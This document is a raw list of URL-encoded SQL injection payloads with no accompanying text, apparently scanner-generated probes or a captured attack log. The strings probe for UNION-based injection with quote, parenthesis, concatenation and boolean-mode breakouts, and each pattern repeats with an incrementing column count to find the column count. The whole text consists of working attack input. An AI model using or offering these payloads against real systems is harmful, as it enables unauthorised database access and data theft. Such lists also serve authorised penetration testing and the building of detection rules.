-6789%27%7C%7C%28SELECT%20%27NiNT%27%20FROM%20DUAL%20WHERE%206514%3D6514%20UNION%20ALL%20SELECT%206514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%23 -5118%27%7C%7C%28SELECT%20%27KLNk%27%20FROM%20DUAL%20WHERE%205410%3D5410%20UNION%20ALL%20SELECT%205410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%23 -1855%27%7C%7C%28SELECT%20%27QqHc%27%20FROM%20DUAL%20WHERE%206952%3D6952%20UNION%20ALL%20SELECT%206952%2C6952%2C6952%2C6952%2C6952%2C6952%2C6952%2C6952%2C6952%2C6952%2C6952%2C6952%2C6952%2C6952%2C6952%2C6952%23 -2841%27%7C%7C%28SELECT%20%27bQTB%27%20FROM%20DUAL%20WHERE%205225%3D5225%20UNION%20ALL%20SELECT%205225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%2C5225%23 -4113%27%7C%7C%28SELECT%20%27FhYz%27%20FROM%20DUAL%20WHERE%202748%3D2748%20UNION%20ALL%20SELECT%202748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%2C2748%23 -5033%27%7C%7C%28SELECT%20%27GNEI%27%20FROM%20DUAL%20WHERE%206930%3D6930%20UNION%20ALL%20SELECT%206930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%23 -2413%27%7C%7C%28SELECT%20%27CCGX%27%20FROM%20DUAL%20WHERE%203171%3D3171%20UNION%20ALL%20SELECT%203171%2C3171%2C3171%2C3171%2C3171%2C3171%2C3171%2C3171%2C3171%2C3171%2C3171%2C3171%2C3171%2C3171%2C3171%2C3171%2C3171%2C3171%2C3171%2C3171%23 -7861%27%7C%7C%28SELECT%20%27gDhM%27%20WHERE%202565%3D2565%20UNION%20ALL%20SELECT%202565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%2C2565%23 -4972%27%7C%7C%28SELECT%20%27rprS%27%20WHERE%201927%3D1927%20UNION%20ALL%20SELECT%201927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%23 -3981%27%7C%7C%28SELECT%20%27ajLu%27%20WHERE%206473%3D6473%20UNION%20ALL%20SELECT%206473%2C6473%2C6473%2C6473%2C6473%2C6473%2C6473%2C6473%2C6473%2C6473%2C6473%2C6473%2C6473%23 -3165%27%7C%7C%28SELECT%20%27JhsV%27%20WHERE%209828%3D9828%20UNION%20ALL%20SELECT%209828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%2C9828%23 -1297%27%7C%7C%28SELECT%20%27pUUr%27%20WHERE%202977%3D2977%20UNION%20ALL%20SELECT%202977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%23 -1925%27%7C%7C%28SELECT%20%27yEqV%27%20WHERE%204066%3D4066%20UNION%20ALL%20SELECT%204066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%23 -7830%27%7C%7C%28SELECT%20%27qXnk%27%20WHERE%201489%3D1489%20UNION%20ALL%20SELECT%201489%2C1489%2C1489%2C1489%2C1489%2C1489%2C1489%2C1489%2C1489%2C1489%2C1489%2C1489%2C1489%2C1489%2C1489%2C1489%2C1489%23 -2223%27%7C%7C%28SELECT%20%27ohQn%27%20WHERE%205137%3D5137%20UNION%20ALL%20SELECT%205137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%23 -7782%27%7C%7C%28SELECT%20%27cZVY%27%20WHERE%208295%3D8295%20UNION%20ALL%20SELECT%208295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%23 -2419%27%7C%7C%28SELECT%20%27oOVG%27%20WHERE%206547%3D6547%20UNION%20ALL%20SELECT%206547%2C6547%2C6547%2C6547%2C6547%2C6547%2C6547%2C6547%2C6547%2C6547%2C6547%2C6547%2C6547%2C6547%2C6547%2C6547%2C6547%2C6547%2C6547%2C6547%23 -8127%27%2B%28SELECT%20oCTy%20WHERE%205899%3D5899%20UNION%20ALL%20SELECT%205899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%2C5899%23 -9337%27%2B%28SELECT%20XDUO%20WHERE%203181%3D3181%20UNION%20ALL%20SELECT%203181%2C3181%2C3181%2C3181%2C3181%2C3181%2C3181%2C3181%2C3181%2C3181%2C3181%2C3181%23 -4642%27%2B%28SELECT%20KgLR%20WHERE%203402%3D3402%20UNION%20ALL%20SELECT%203402%2C3402%2C3402%2C3402%2C3402%2C3402%2C3402%2C3402%2C3402%2C3402%2C3402%2C3402%2C3402%23 -9072%27%2B%28SELECT%20bEOB%20WHERE%206475%3D6475%20UNION%20ALL%20SELECT%206475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%2C6475%23 -7556%27%2B%28SELECT%20LNRy%20WHERE%201992%3D1992%20UNION%20ALL%20SELECT%201992%2C1992%2C1992%2C1992%2C1992%2C1992%2C1992%2C1992%2C1992%2C1992%2C1992%2C1992%2C1992%2C1992%2C1992%23 -4632%27%2B%28SELECT%20syko%20WHERE%207480%3D7480%20UNION%20ALL%20SELECT%207480%2C7480%2C7480%2C7480%2C7480%2C7480%2C7480%2C7480%2C7480%2C7480%2C7480%2C7480%2C7480%2C7480%2C7480%2C7480%23 -5095%27%2B%28SELECT%20InGP%20WHERE%203613%3D3613%20UNION%20ALL%20SELECT%203613%2C3613%2C3613%2C3613%2C3613%2C3613%2C3613%2C3613%2C3613%2C3613%2C3613%2C3613%2C3613%2C3613%2C3613%2C3613%2C3613%23 -2465%27%2B%28SELECT%20OaKe%20WHERE%209736%3D9736%20UNION%20ALL%20SELECT%209736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%2C9736%23 -8040%27%2B%28SELECT%20Dmox%20WHERE%201275%3D1275%20UNION%20ALL%20SELECT%201275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%2C1275%23 -4901%27%2B%28SELECT%20EGMo%20WHERE%204437%3D4437%20UNION%20ALL%20SELECT%204437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%23 -3596%27%2B%28SELECT%20%27OMgk%27%20WHERE%205666%3D5666%20UNION%20ALL%20SELECT%205666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%2C5666%23 -5160%27%2B%28SELECT%20%27RxTi%27%20WHERE%201999%3D1999%20UNION%20ALL%20SELECT%201999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%2C1999%23 -1255%27%2B%28SELECT%20%27PBGS%27%20WHERE%208447%3D8447%20UNION%20ALL%20SELECT%208447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%2C8447%23 -1398%27%2B%28SELECT%20%27cpud%27%20WHERE%208121%3D8121%20UNION%20ALL%20SELECT%208121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%23 -9006%27%2B%28SELECT%20%27JShJ%27%20WHERE%203274%3D3274%20UNION%20ALL%20SELECT%203274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%2C3274%23 -6170%27%2B%28SELECT%20%27BDIz%27%20WHERE%206165%3D6165%20UNION%20ALL%20SELECT%206165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%2C6165%23 -2323%27%2B%28SELECT%20%27mXyC%27%20WHERE%203740%3D3740%20UNION%20ALL%20SELECT%203740%2C3740%2C3740%2C3740%2C3740%2C3740%2C3740%2C3740%2C3740%2C3740%2C3740%2C3740%2C3740%2C3740%2C3740%2C3740%2C3740%23 -4587%27%2B%28SELECT%20%27YcDi%27%20WHERE%207572%3D7572%20UNION%20ALL%20SELECT%207572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%2C7572%23 -3221%27%2B%28SELECT%20%27WIXE%27%20WHERE%207202%3D7202%20UNION%20ALL%20SELECT%207202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%23 -3232%27%2B%28SELECT%20%27sbmZ%27%20WHERE%206631%3D6631%20UNION%20ALL%20SELECT%206631%2C6631%2C6631%2C6631%2C6631%2C6631%2C6631%2C6631%2C6631%2C6631%2C6631%2C6631%2C6631%2C6631%2C6631%2C6631%2C6631%2C6631%2C6631%2C6631%23 -4829%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205229%2C5229%2C5229%2C5229%2C5229%2C5229%2C5229%2C5229%2C5229%2C5229%2C5229%23 -5325%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%23 -5377%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202078%2C2078%2C2078%2C2078%2C2078%2C2078%2C2078%2C2078%2C2078%2C2078%2C2078%2C2078%2C2078%23 -7458%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209380%2C9380%2C9380%2C9380%2C9380%2C9380%2C9380%2C9380%2C9380%2C9380%2C9380%2C9380%2C9380%2C9380%23 -7616%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206521%2C6521%2C6521%2C6521%2C6521%2C6521%2C6521%2C6521%2C6521%2C6521%2C6521%2C6521%2C6521%2C6521%2C6521%23 -1215%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205909%2C5909%2C5909%2C5909%2C5909%2C5909%2C5909%2C5909%2C5909%2C5909%2C5909%2C5909%2C5909%2C5909%2C5909%2C5909%23 -4690%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202272%2C2272%2C2272%2C2272%2C2272%2C2272%2C2272%2C2272%2C2272%2C2272%2C2272%2C2272%2C2272%2C2272%2C2272%2C2272%2C2272%23 -2840%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%23 -9901%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203330%2C3330%2C3330%2C3330%2C3330%2C3330%2C3330%2C3330%2C3330%2C3330%2C3330%2C3330%2C3330%2C3330%2C3330%2C3330%2C3330%2C3330%2C3330%23 -3119%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207819%2C7819%2C7819%2C7819%2C7819%2C7819%2C7819%2C7819%2C7819%2C7819%2C7819%2C7819%2C7819%2C7819%2C7819%2C7819%2C7819%2C7819%2C7819%2C7819%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 